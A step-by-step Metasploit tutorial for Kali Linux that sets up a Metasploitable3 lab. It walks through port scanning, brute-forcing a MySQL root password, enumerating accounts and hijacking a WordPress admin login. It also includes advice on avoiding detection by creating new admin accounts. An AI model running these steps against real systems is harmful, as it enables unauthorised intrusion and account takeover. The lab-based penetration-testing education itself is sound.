How to Use Metasploit in Kali Linux

How to Use Metasploit in Kali Linux: A Step-By-Step Tutorial

Getting started with Metasploit can be challenging for new users. You may have trouble installing Metasploit as antivirus applications often flag it as malicious, and failing to install prerequisite software (e.g., PostgreSQL) will limit functionality.

This tutorial will help you bypass these pitfalls by teaching you how to use Metasploit in Kali Linux on a Virtual Machine (VM). On Kali, you’ll find Metasploit Framework pre-installed along with 600 other useful security tools. We’ll also help you set up a deliberately vulnerable system (Metasploitable3) with which to practice.

In this tutorial, we will cover:

  • Deploying a Kali Linux virtual machine with Metasploit pre-installed
  • Setting up a target in a virtual lab
  • A sample walkthrough against a vulnerable MySQL Server
  • Frequently Asked Questions (FAQ)

Without further ado, let’s get started!

Minimum System Requirements for Metasploit

Kali Linux (in its barebones state) can run on as little as 128MB of RAM and 2GB of disk space, but this isn’t sufficient to run Metasploit Framework. For that, the minimum system requirements are:

  • Processor: 2GHz+ processing power
  • Memory: 4GB of RAM (8GB is recommended)
  • Storage: 1GB of disk space (50GB is recommended)

Note: If you are installing Metasploit Framework as a stand-alone application on Windows, Linux, or OSX, you should disable your antivirus software and firewall as these can interfere with installation and operation!

How to Setup a Metasploit Virtual Lab Using Kali Linux and Metasploitable3

While it’s possible to install Metasploit Framework as a standalone application, the quickest (and easiest) way to get started with Metasploit is to use a Linux distribution it’s already present on, such as Kali Linux. 

We’ll use Metasploitable3, which includes an intentionally-vulnerable Windows Server 2008 R2 Virtual Machine (VM) for our target. To do this, we will download and install:

  • Oracle VirtualBox to host our VMs on a compatible Windows PC
  • Vagrant to provision our Metasploitable3 VMs (Windows Server 2008 R2)
  • The Kali Linux Virtual Appliance for VirtualBox

Download and Install VirtualBox

1. Download and install the latest version of VirtualBox using the Windows hosts link:

Download and install virtualbox window

Follow the on-screen prompts to complete the installation. For a detailed explanation of the Setup Wizard options, you can refer to Chapter 2 of the VirtualBox manual.

2. Once installed, you’ll see the Oracle VM VirtualBox in your start menu, click on it to launch the VirtualBox application.
3. We’ll also need to download and install the Oracle VM VirtualBox Extension Pack as  it’s required to run the Kali Linux Virtual Appliance:

4. Running the file will prompt you with a warning. Click Install to proceed:

5. After reading the license terms, click I Agree to proceed:

6. When completed, you’ll receive a notice indicating that the installation was successful.

Click OK to close the window:

Install Vagrant and Provision the Metasploitable3 VMs

Rapid7 (the developers of Metasploit and Metasploitable) uses an open-source tool called Vagrant to provide their pre-built Metasploitable3 images. In the instructions below, we will:

  • Install Vagrant
  • Pull down Rapid7’s Vagrant configuration file, “Vagrantfile,” from their GitHub repository
  • Deploy the Metasploitable3 VMs using Vagrant

The configuration file (i.e., “Vagrantfile”) provisions two Metasploitable3 VMs images, Ubuntu 14.04 and Window Server 2008 R2 – we’ll be using the later. These VMs will require 65GB of storage and 4.5GB of RAM, so be sure you have sufficient resources before deploying these VMs.

Note: The Window Server 2008 R2 operating system uses a trial license which may have expired on the provisioned VM. The VM will shut down every 1-2 hours if the trial expires, so you’ll either want to rebuild the VM or give it a license key (if you have one).

  1. We’ll need to download and install the latest version of Vagrant to provision Metasploitable3 VMs:

Note: “686” refers to the 32-bit version. We’ll be using “Amd64”, the 64-bit version. The installation will require a reboot!

After downloading the installation package, simply run it and follow the prompts to complete the installation. The product documentation (found here) can help you answer any questions about installation or compatibility.

  1. With VirtualBox and Vagrant installed, we can pull down the Metasploitable3 VMs. To do this, open PowerShell as an administrator and create a new staging folder (I chose “D:\Temp” for this demonstration).

    a. Run the following command to pull down the Vagrant deployment script for the Metasploitable3 VMs from the GitHub repository: Invoke-WebRequest -Uri “https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile” -OutFile “Vagrantfile”

b. Then run vagrant up to download and provision the Metasploitable3 VMs:

  1. For your VMs to be on the same network as your host, you’ll want to configure their network adapters to run in “bridged” mode (i.e., the virtual network adapter behaves as though it’s on the same network as the physical VM host). You can do this by clicking on Settings > Network and selecting Bridged Adapter:

Click OK to save the settings.

  1. You’ll need to log into the Windows Server 2008 R2 VM and verify its IP address. The default credentials are:
    1. Username: vagrant
    2. Password: vagrant
  2. Open Command Prompt and run ipconfig to verify the IP address (192.168.5.122 on my VM):

Your IP address will differ depending on the DHCP range used by your test environment’s network. Take note of this address as you’ll need it later.

We now have a Metasploitable3 VM running and ready to exploit! Next, we’ll need to download and configure our Kali Linux VM.

Download and Configure the Kali Linux Virtual Appliance for VirtualBox

Note: We will not need to download and install Metasploit Framework and its optional supporting tools since they’re already present on that image.

1. Browse to https://www.kali.org/get-kali/#kali-platforms and select Virtual Machines from the list of available platforms:

2. We’ll choose the 64-bit (default) and select VirtualBox VM. Click the to download the file:

3. Once the Kali Linux virtual appliance file finishes downloading, you can import it into VirtualBox by opening the Oracle VM VirtualBox Manager and selecting File > Import Appliance…

4. Locate the downloaded Kali Linux virtual appliance file and select Open, then click Next and finally Import:

You can monitor the import process using the display bar, which closes when completed.

5. You will now see both Metasploitable3 VMs and Kali Linux VMs in your list:

Before we launch Kali, we’ll want to configure the VM’s network adapter in bridged mode, just as we did for our Metasploitable3 Windows Server 2008 R2 VM (see step 3 of the previous section).

6. Select the Kali Linux VM from the list and click Start to run the VM:

Note: If your Kali Linux appliance failed to launch, this could be because you did not install the Oracle VM VirtualBox Extension Pack, which you can find here.

7. You can now login to the Kali Linux VM using the default credentials:

  • Username: kali
  • Password: kali

8. Before starting the Metasploit Framework console, we’ll want to verify that we have network connectivity from Kali Linux to the Metasploitable3 VM by pinging its IP address (the one we noted in Step 5 of the previous section). To do this, open a terminal session using CTRL+ALT+T, then ping the IP address of the Metasploitable3 server:

We are now ready to begin using Metasploit!

How to Use Metasploit in Kali Linux

  1. Click the Applications button in the upper right-hand corner of the screen (shaped like a white dragon with a blue background)
  2. As you begin to type, “metasploit,” the search bar auto-complete will bring up the metasploit framework application:

The shortcut launches a terminal window and runs the following command:

To understand what this is doing, we can break the command down into three parts:

  1. In Unix-like operating systems such as Linux, ‘sudo’ is used to run other commands that require elevated permissions (required by the next two steps).
  2. The command ‘msfdb init’ starts the PostgreSQL service, checks to see if a database exists for Metasploit, and if not, creates it.
  3. Lastly, ‘&&’ checks whether the preceding command (i.e., ‘msfdb init’) executed successfully, and if so, runs the subsequent command ‘msfconsole,’ launching the Metasploit Framework Console.


The console displays one of several random banners upon launch:

You can display a different banner at any time by using the Banner command, or if you’re running Metasploit from a terminal window, you can include the -q switch (e.g., msfconsole -q) to prevent a banner from displaying on launch.

Before you begin, run the ‘db_status’ command to verify that the PostgreSQL service is running and that the Metasploit Framework database is initialized:

Note: If it doesn’t display “Connected to msf,” ensure that the PostgreSQL service is started (e.g., open a terminal window and type sudo service postgresql start), then rerun msfdb init.

How to Use the Metasploit Framework Console

The Metasploit Framework Console (msfconsole) is a command-line interface (CLI) that allows you to search for and run modules (stand-alone pieces of software used to perform a particular task) and fall into three broad categories:

  • Auxiliary: These modules gather information about a target, such as the TCP Port Scanner and SSH Login Scanners used in our demonstration attack.
  • Exploits: These modules (through the use of payloads) take advantage of discovered vulnerabilities to exploit known weaknesses on target systems. E.g., the ProFTPD attack we used to gain access to the user list on our target system.
  • Payloads: Payloads are the code used by the exploit module to interact with a target.

To get started, enter help to view a list of commands:

Some other useful commands include:

  • Search –  Used to look up modules by name, description, CVE number, etc.
  • Use – Launches a module by name, search term, or index number
    • Options – Display options for a loaded module
    • Set – Configure specific options/variables from inside a loaded module
    • Run – Runs the loaded module
  • Back – Backs out of the current context you’re in
  • Exit – Quits the console

In the walkthrough below, we’ll provide detailed examples of how to use these commands.

OTHER ARTICLES AND CHEAT SHEETS YOU MIGHT LIKE

Metasploit Walkthrough: Exploiting MySQL

Now that we have set up our virtual lab, verified connectivity, and covered some basic concepts and commands, let’s step through a sample MySQL exploit.

MySQL Service Discovery

We’ll want to use a port scanner to understand what ports are open on our target. While Kali Linux comes pre-packaged with several port scanning tools, we can also see which ones are available in the Metasploit Framework console using the search command (e.g., search portscan):

The keyword in the search is highlighted. Number 5 looks promising, so let’s use the info to provide us with additional information (i.e., info 5):

Having read the description, we know that this utility is suitable for our purposes, so we’ll enter use 5 to load the “TCP Port Scanner” module:

Note that the prompt has changed to “msf6 auxiliary(scanner/portscan/tcp) >”, indicating that the “TCP Port Scanner” module is currently loaded.

Although the info command provided us with a list of available options, we can use the options command from within the module context to display their current configuration:

We can see that RHOSTS is the parameter for our target, so we’ll need to configure it using the set command (i.e., set RHOSTS 192.168.5.122)

If we enter options again, we can see that the RHOSTS parameter is set to our Metasploitable3 VM’s IP address:

The default port range for this scanner is 1-10,000. If left as-is, the scanner would eventually determine that port 3306 (MySQL) is open. For the sake of brevity, we’ll use the set command to update this to only check for the presence of MySQL on the target (Port 3306):

With our options set, we can now use the run command to scan 192.168.5.122 on 3306:

Kali Linux comes with several other third-party port-scanning utilities, including Nmap, which we can use to interrogate port 3306 to learn more about the MySQL service running using the following command

sudo nmap -sV -O 192.168.5.122 -p3306

  • Sudo nmap runs the Nmap command with elevated permissions (required by the -O switch, described below)
  • -sV probes the target ports to attempt to determine the service running on that port and its  version (required to determine whether the target is using an old/known vulnerable version of a particular service)
  • -O enables Operating System detection (also useful as the OS may have known vulnerabilities associated with it)
  • 192.168.5.122 is the IP address of our target
  • -p3306 specifies the port(s) we want to scan (we chose port 3306 since we know the target is listening on that that)

Our Nmap scan confirms MySQL is running on the target server running version 5.5.20. You can also use the search command to look for a module to we can use to determine the MySQL version (e.g., search type:auxiliary mysql)

Looking at the list above, number 11 (auxiliary/scanner/mysql/mysql_version) seems suitable. To select it, enter use 11:

use 11 terminal console output

If we look at the options for this module, we can see that it requires a target host (RHOSTS). We’ll set this to 192.168.5.122, verify the settings with the options command again and then run the module:

Bruteforcing the MySQL Root Account

Now that we’ve confirmed MySQL’s version and port number, we can attempt to connect to the instance and bruteforce the root password using the auxiliary/scanner/mysql/mysql_login module (e.g., use auxiliary/scanner/mysql/mysql_login) :

use auxiliaryscannermysqlmysql_login terminal console output

We’ll review the list of options, then set RHOSTS to 192.168.5.122. This module also supports the use of word list, we’ll use /usr/share/wordlists/rockyou.txt, but first, we’ll need to unzip it. Open a terminal session (CTRL+ALT+T) and use the following command to unzip the archive: gunzip /usr/share/wordlists/rockyou.txt.gz

gunzip /usr/share/wordlists/rockyou.txt.gz terminal console output

Going back to the Metasploit session, we can use “set PASS_FILE /usr/share/wordlists/rockyou.txt” to define the wordlist path and run the module:

set PASS_FILE /usr/share/wordlists/rockyou.txt terminal console output

The output indicates that the root password is blank.

Enumerating Data From MySQL

In cyber security, “enumeration” is the extraction of useful information from a compromised target to gain access to sensitive information.

We can load the MySQL Enumeration Module (auxiliary/admin/mysql/mysql_enum) to retrieve a list of the MySQL accounts and their privileges:

use auxiliary/admin/mysql/mysql_enum terminal console output

MySQL Exploitation

As we can see from MySQL enumeration results, root access allows us to compromise any data available in SQL server. We can use the “MySQL SQL Generic Query” module (auxiliary/admin/mysql/mysql_sql) to run SQL commands on the target server:

use auxiliary/admin/mysql/mysql_sql terminal console output

We’ll set USERNAME to root, RHOSTS to 192.168.5.122 and SQL to show databases, confirm our options and run the module:

set USERNAME root terminal console output

This gives us a list databases on the server but is a bit tedious to work with as you have to keep updating the SQL option and rerunning the module to get anywhere with it. Instead, we’ll just connect directly to the MySQL instance using our root privileges in a new terminal session (CTRL+ALT+T):

CTRL+ALT+T terminal console output

I’d like gain access to that WordPress application, so let’s change the admin password to something we know (e.g., MyNewPassword123!):

change the admin password terminal console output

Lastly, let’s try logging in to WordPress web application using the newly reset Admin Password:

metasploit3 admin login

This works as we can log in successfully using the reset credentials:

metasploit3 dashboard

Note: An alternative (read: better) option would be to use our MySQL root access to create a new admin user account on any systems we wanted to compromise as changing an existing password (and other destructive behavior) is more likely to be detected by a  user or systems administrator.

Conclusion

In this tutorial, we described how to set up a virtual lab using Kali Linux and Metasploitable3, explained the basics of Metasploit Framework, and demonstrated an attack against a vulnerable MySQL Database Server running on Windows Server 2008 R2.

The information and examples provided in this tutorial only scratch the surface of what you can do with Kali Linux and Metasploit Framework. To learn more about this and other penetration testing tools, consider checking out StationX’s Complete Ethical Hacker Course.

Frequently Asked Questions

CATEGORIES
>